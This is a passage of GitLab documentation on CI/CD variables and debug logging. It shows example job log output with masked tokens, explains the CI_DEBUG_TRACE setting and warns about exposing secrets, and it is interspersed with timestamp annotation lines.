2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
Example job log output (truncated):
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
```shell
export CI_JOB_ID="50"
export CI_COMMIT_SHA="1ecfd275763eff1d6b4844ea3168962458c9f27a"
export CI_COMMIT_SHORT_SHA="1ecfd275"
export CI_COMMIT_REF_NAME="main"
export CI_REPOSITORY_URL="https://gitlab-ci-token:[masked]@example.com/gitlab-org/gitlab-foss.git"
export CI_COMMIT_TAG="1.0.0"
export CI_JOB_NAME="spec:other"
export CI_JOB_STAGE="test"
export CI_JOB_MANUAL="true"
export CI_JOB_TRIGGERED="true"
export CI_JOB_TOKEN="[masked]"
export CI_PIPELINE_ID="1000"
export CI_PIPELINE_IID="10"
export CI_PAGES_DOMAIN="gitlab.io"
export CI_PAGES_URL="https://gitlab-org.gitlab.io/gitlab-foss"
export CI_PROJECT_ID="34"
export CI_PROJECT_DIR="/builds/gitlab-org/gitlab-foss"
export CI_PROJECT_NAME="gitlab-foss"
export CI_PROJECT_TITLE="GitLab FOSS"
...
```
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
### Enable debug logging
2021-09-30 23:02:18 +05:30
WARNING:
Debug logging can be a serious security risk. The output contains the content of
all variables and other secrets available to the job. The output is uploaded to the
GitLab server and visible in job logs.
You can use debug logging to help troubleshoot problems with pipeline configuration
or job scripts. Debug logging exposes job execution details that are usually hidden
by the runner and makes job logs more verbose. It also exposes all variables and secrets
available to the job.
2023-03-04 22:38:38 +05:30
Before you enable debug logging, make sure only team members
2021-09-30 23:02:18 +05:30
can view job logs. You should also [delete job logs](../jobs/index.md#view-jobs-in-a-pipeline)
with debug output before you make logs public again.
To enable debug logging (tracing), set the `CI_DEBUG_TRACE` variable to `true`:
```yaml
job_name:
variables:
CI_DEBUG_TRACE: "true"
```
Example output (truncated):
2023-01-13 00:05:48 +05:30
```plaintext
2021-09-30 23:02:18 +05:30
...
export CI_SERVER_TLS_CA_FILE="/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE"
if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then
echo $'\''\x1b[32;1mFetching changes...\x1b[0;m'\''
$'\''cd'\'' "/builds/gitlab-examples/ci-debug-trace"
$'\''git'\'' "config" "fetch.recurseSubmodules" "false"
$'\''rm'\'' "-f" ".git/index.lock"
$'\''git'\'' "clean" "-ffdx"
$'\''git'\'' "reset" "--hard"
$'\''git'\'' "remote" "set-url" "origin" "https://gitlab-ci-token:xxxxxxxxxxxxxxxxxxxx@example.com/gitlab-examples/ci-debug-trace.git"
$'\''git'\'' "fetch" "origin" "--prune" "+refs/heads/*:refs/remotes/origin/*" "+refs/tags/*:refs/tags/lds"
++ CI_BUILDS_DIR=/builds
++ export CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace
++ CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace
++ export CI_CONCURRENT_ID=87
++ CI_CONCURRENT_ID=87
++ export CI_CONCURRENT_PROJECT_ID=0
++ CI_CONCURRENT_PROJECT_ID=0
++ export CI_SERVER=yes
++ CI_SERVER=yes
++ mkdir -p /builds/gitlab-examples/ci-debug-trace.tmp
++ echo -n '-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----'
++ export CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE
++ CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE
++ export CI_PIPELINE_ID=52666
++ CI_PIPELINE_ID=52666
++ export CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666
++ CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666
++ export CI_JOB_ID=7046507
++ CI_JOB_ID=7046507
++ export CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655
++ CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655
++ export CI_JOB_TOKEN=[MASKED]
++ CI_JOB_TOKEN=[MASKED]
++ export CI_REGISTRY_USER=gitlab-ci-token
++ CI_REGISTRY_USER=gitlab-ci-token
++ export CI_REGISTRY_PASSWORD=[MASKED]
++ CI_REGISTRY_PASSWORD=[MASKED]
++ export CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git
++ CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git
++ export CI_JOB_NAME=debug_trace
++ CI_JOB_NAME=debug_trace
++ export CI_JOB_STAGE=test
++ CI_JOB_STAGE=test
++ export CI_NODE_TOTAL=1
++ CI_NODE_TOTAL=1
++ export CI=true
++ CI=true
++ export GITLAB_CI=true
++ GITLAB_CI=true
++ export CI_SERVER_URL=https://gitlab.com:3000
++ CI_SERVER_URL=https://gitlab.com:3000
++ export CI_SERVER_HOST=gitlab.com
++ CI_SERVER_HOST=gitlab.com
++ export CI_SERVER_PORT=3000
++ CI_SERVER_PORT=3000
++ export CI_SERVER_PROTOCOL=https
++ CI_SERVER_PROTOCOL=https
++ export CI_SERVER_NAME=GitLab
++ CI_SERVER_NAME=GitLab
2022-07-23 23:45:48 +05:30
++ export GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal
++ GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,cluster_health,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal
2021-09-30 23:02:18 +05:30
++ export CI_PROJECT_ID=17893
++ CI_PROJECT_ID=17893
++ export CI_PROJECT_NAME=ci-debug-trace
++ CI_PROJECT_NAME=ci-debug-trace
...
```
2023-03-17 16:20:25 +05:30
#### Restrict access to debug logging
2021-09-30 23:02:18 +05:30
> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/213159) in GitLab 13.7.
> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/292661) in GitLab 13.8.
You can restrict access to debug logging. When restricted, only users with
2022-04-04 11:22:00 +05:30
at least the Developer role
2021-09-30 23:02:18 +05:30
can view job logs when debug logging is enabled with a variable in:
2023-03-17 16:20:25 +05:30
- The [`.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file).
2021-09-30 23:02:18 +05:30
- The CI/CD variables set in the GitLab UI.
WARNING:
If you add `CI_DEBUG_TRACE` as a local variable to runners, debug logs generate and are visible
to all users with access to job logs. The permission levels are not checked by the runner,
so you should only use the variable in GitLab itself.